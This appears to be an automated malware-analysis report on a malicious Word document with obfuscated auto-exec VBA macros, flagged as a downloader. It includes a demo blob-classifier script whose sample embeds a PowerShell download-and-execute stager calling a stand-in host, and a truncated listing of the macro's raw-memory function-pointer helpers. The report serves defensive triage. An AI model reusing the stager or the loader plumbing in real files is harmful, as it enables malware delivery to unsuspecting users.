Verdict: MALICIOUS (risk score 284)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample is a malicious Office document carrying obfuscated VBA macros, flagged by several high and critical heuristics including OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC. An AutoOpen macro runs the code as soon as the document is opened in Word with macros enabled. The VBA rebuilds its strings at runtime and hands them to COM-instantiation or execution sinks, which keeps the usual CreateObject/Shell/URL indicators out of the macro text; the recovered source also opens with raw-memory helpers (MoveMemory over VARIANT structures, VarPtr, and CallFunc routines that build argument-pointer arrays for a function pointer), i.e. plumbing for calling code through a raw pointer. The ClamAV signature Doc.Downloader.Generic-8023922-0 independently classifies the document as a downloader, so the likely next stage is fetching and executing additional malware.
Heuristics (9)

- ClamAV: Doc.Downloader.Generic-8023922-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Generic-8023922-0.
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
  Document contains VBA macro code.
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN
  The document defines an AutoOpen macro, which Word runs when the document is opened with macros enabled.
- GetObject call [high] OLE_VBA_GETOBJ
  The macro calls GetObject, which obtains a COM object by path or moniker without naming CreateObject.
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
  The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, or documents whose source extraction fails, where no visible source is available.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
  The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace that Office drawing parts reference, so it is expected content rather than a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20639 bytes |

SHA-256: 16d4b675310a0216d7e30ee4c52534b34a089d8c8bfd56796cbd82ee7b8c77ff

Detection: ClamAV found no threats in the carved macro source on its own; the Doc.Downloader.Generic-8023922-0 signature above fired on the complete document.
Obfuscation or payload: likely. The carved artifact contains 2 long base64-like blobs.
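"Base64-like" is an alphabet match, not proof of a payload: a long hex string, for instance, is made entirely of base64 alphabet characters. The script below is an added example, not the analyzer's own check. It locates long runs in a carved artifact, decodes each one (trying hex first when the run is all hex digits, base64 otherwise), and types the result by magic bytes, printability and entropy, so the two blobs reported for macros.bas could be told apart from a false positive. The minimum run length, the classification rules and the sample artifact are assumptions constructed for the demo.

```python
"""Locate and classify long base64-like runs in a carved artifact. Added example."""
import base64
import binascii
import math
import re
from collections import Counter
from typing import Dict, List

MIN_RUN = 64                                         # assumed threshold
RE_B64_LIKE = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_RUN)
RE_HEX = re.compile(r"[0-9A-Fa-f]+")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the ceiling (compressed or encrypted data)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def classify(raw: bytes) -> str:
    """Type decoded bytes by magic, then printability, then entropy."""
    if raw[:2] == b"MZ":
        return "pe-executable"
    if raw[:2] == b"PK":
        return "zip-container"
    if raw[:4] == b"%PDF":
        return "pdf"
    if all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return "ascii-text"
    return "high-entropy-binary" if shannon_entropy(raw) > 7.0 else "binary"


def find_blobs(text: str) -> List[Dict]:
    """One record per base64-like run, stating how (if at all) it decodes."""
    found = []
    for m in RE_B64_LIKE.finditer(text):
        run = m.group(0)
        rec = {"offset": m.start(), "length": len(run), "encoding": "none",
               "kind": "undecodable", "decoded_len": 0, "entropy": 0.0}
        raw = None
        if RE_HEX.fullmatch(run) and len(run) % 2 == 0:
            raw, rec["encoding"] = bytes.fromhex(run), "hex"   # hex beats base64 here
        else:
            try:
                raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
                rec["encoding"] = "base64"
            except binascii.Error:
                pass                                          # alphabet match only
        if raw:
            rec.update(kind=classify(raw), decoded_len=len(raw),
                       entropy=round(shannon_entropy(raw), 2))
        found.append(rec)
    return found


# Constructed artifact: a base64 stager command, a base64 PE header stub,
# and the same stub as a hex string that a naive alphabet check would also
# count as base64.
_PE_STUB = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
            + b"\x00" * 48)
_STAGER = (b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
           b".DownloadString('http://example.invalid/x')\"")
SAMPLE_ARTIFACT = (
    'Attribute VB_Name = "Module1"\n'
    "Private Sub AutoOpen()\n"
    f'    stage = "{base64.b64encode(_STAGER).decode()}"\n'
    f'    stub = "{base64.b64encode(_PE_STUB).decode()}"\n'
    f'    hdr = "{_PE_STUB.hex().upper()}"\n'
    "End Sub\n"
)

if __name__ == "__main__":
    for rec in find_blobs(SAMPLE_ARTIFACT):
        print(rec)
```

On the constructed artifact the three runs come back as base64/ascii-text (the stager command, readable after decoding), base64/pe-executable and hex/pe-executable. A run that decodes under neither scheme stays "undecodable", which is the honest label for a long identifier or a custom-alphabet encoding.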
Preview script (first 1,000 lines of the extracted script; the original non-ASCII comments were lost in extraction and are replaced here by editorial comments describing what each routine does)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' ref: copy the raw 16-byte VARIANT of value_, set VT_BYREF (&H4000) if it is
' not already set, and point it at the caller's storage, so the returned
' Variant aliases the original variable instead of holding a copy.
Public Function ref(value_) As Variant
    Dim v_ As VariantStruct
    MoveMemory v_, value_, LenB(v_)
    If (v_.VarType And &H4000) = 0 Then
        v_.VarType = v_.VarType Or &H4000
        v_.pEntity0 = VarPtr(value_) + (VarPtr(v_.pEntity0) - VarPtr(v_))
    End If
    MoveMemory ref, v_, LenB(v_)
End Function
' Move: transfer the raw contents of value_ into the return value and leave
' value_ as Empty, so the moved contents are not released twice.
Public Function Move(value_) As Variant
    MoveMemory Move, value_, cSizeOfVariant
    MoveMemory value_, Empty, cSizeOfVariant ' source becomes Empty (no double release)
End Function
' CallFunc2: build type and pointer arrays for calling the function at pFunc_
' (on object pObj_) with the elements of args_ as arguments.
Public Sub CallFunc2(pObj_ As LongPtr, pFunc_ As LongPtr, ByRef args_, Optional ByRef out_result_, Optional isVbaClass_ As Boolean)
    Dim argLength_&: argLength_ = UBound(args_) + 1
    Dim argResLength_&: argResLength_ = argLength_ + (Not IsMissing(out_result_)) * isVbaClass_
    ' type and pointer arrays reused across calls
    Static types_%()
    Static pArgs_() As LongPtr
    Select Case True
        Case (Not types_) = -1 ' array never allocated (Not on an unallocated array yields -1)
            Dim minLen_&: minLen_ = IIf(argResLength_ > 7, argResLength_, 7) ' start with at least 7 slots
            initArgArray_ minLen_, types_, pArgs_
        Case argResLength_ > UBound(types_) + 1
            initArgArray_ argResLength_, types_, pArgs_
    End Select
    ' one pointer per argument
    Dim i&
    For i = 0 To argLength_ - 1
        pArgs_(i) = VarPtr(args_(i))
    Next
    ' return-value slot
    If Not isVbaClass_ Then
        Dim resultType_ As VbVarType
        If Not IsMissing(out_result_) Then resultType_ = vbVariant
    Else
        If argResLength_ > argLength_ Then
            Dim result_
            resultArg_.VarType = vbVariant Or &H4000
            resultArg_.pEntity0 = VarPtr(result_)
            types_(argLength_) = vbVariant Or &H4000
            pArgs_(argLength_) = VarPtr(resultArg_)
        End If
        Dim res_
    End If
End Sub
' CallFunc: same as CallFunc2, but the arguments are a contiguous block of
' Variants starting at pArgTop_ rather than a VBA array.
Public Sub CallFunc( _
    _
    pObj_ As LongPtr, pFunc_ As LongPtr, pArgTop_ As LongPtr, argLength_&, _
    _
    Optional ByRef out_result_, Optional isVbaClass_ As Boolean _
    _
)
    Dim argResLength_&: argResLength_ = argLength_ + (Not IsMissing(out_result_)) * isVbaClass_
    ' type and pointer arrays reused across calls
    Static types_%()
    Static pArgs_() As LongPtr
    Select Case True
        Case (Not types_) = -1 ' array never allocated
            Dim minLen_&: minLen_ = IIf(argResLength_ > 7, argResLength_, 7) ' start with at least 7 slots
            initArgArray_ minLen_, types_, pArgs_
        Case argResLength_ > UBound(types_) + 1
            initArgArray_ argResLength_, types_, pArgs_
    End Select
    ' one pointer per argument, each cSizeOfVariant bytes apart
    Dim i&
    For i = 0 To argLength_ - 1
        pArgs_(i) = pArgTop_ + i * cSizeOfVariant
    Next
    ' return-value slot
    If Not isVbaClass_ Then
        Dim resultType_ As VbVarType
        If Not IsMissing(out_result_) Then resultType_ = vbVariant
    Else
        If argResLength_ > argLength_ Then
            Dim result_
            resultA
```
... (truncated)